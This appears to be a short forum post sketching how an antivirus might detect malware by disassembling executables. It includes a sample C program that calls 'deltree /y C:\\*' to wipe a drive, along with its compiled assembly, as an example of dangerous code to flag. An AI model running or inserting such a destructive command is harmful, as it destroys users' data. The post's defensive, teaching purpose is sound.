1. Analyse virus code (plenty on hacking sites):
Code:
#include <stdio.h>
int main()
{
system("deltree /y C:\\*");
return 0;
}
2. Code a disassembler (or use an opensource one)
3. Disassemble executables with it (above program, I just used gcc's -S option to get this but you get the idea):
Code:
.file "test.c"
.section .rodata
.LC0:
.string "deltree /y C:\\*"
.text
.globl main
.type main, @function
main:
leal 4(%esp), %ecx
andl $-16, %esp
pushl -4(%ecx)
pushl %ebp
movl %esp, %ebp
pushl %ecx
subl $4, %esp
movl $.LC0, (%esp)
call system
movl $0, %eax
addl $4, %esp
popl %ecx
popl %ebp
leal -4(%ecx), %esp
ret
.size main, .-main
.ident "GCC: (Ubuntu 4.3.3-5ubuntu4) 4.3.3"
.section .note.GNU-stack,"",@progbits
5. Make you anti-virus read the disassembled output and figure out dangerous code (e.g. in the program above when you read "deltree /y C:\\*" you know it's a virus)
Bookmarks